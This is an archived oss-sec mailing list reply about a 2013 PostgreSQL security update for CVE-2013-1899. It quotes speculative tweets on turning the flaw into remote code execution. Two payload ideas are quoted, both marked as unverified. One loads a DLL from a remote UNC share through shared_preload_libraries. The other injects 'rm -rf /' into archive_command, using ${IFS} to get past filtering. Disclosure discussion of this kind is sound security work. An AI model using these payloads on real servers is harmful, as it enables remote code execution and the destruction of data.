oss-sec mailing list archives
Re: PostgreSQL security update
From: Solar Designer <solar () openwall com>
Date: Thu, 4 Apr 2013 18:48:16 +0400
On Thu, Apr 04, 2013 at 06:39:31PM +0400, Solar Designer wrote:
> A heads-up in case someone missed today's news:
>
> http://www.postgresql.org/about/news/1456/
> http://www.postgresql.org/support/security/faq/2013-04-04/

HD Moore's quick tweets on possible exploitability of CVE-2013-1899 into remote code execution (beyond the attack vectors mentioned in "2013-04-04 Security Release FAQ" above):

<@hdmoore> @quine exploitation seems tricky, I wonder if -c shared_preload_libraries=\\unc\share\blah.dll is doable
<@hdmoore> @quine Another options appears to be something like: -c archive_command=rm${IFS}-rf${IFS}/

Indeed, these have not been verified yet and they might not be doable.

Alexander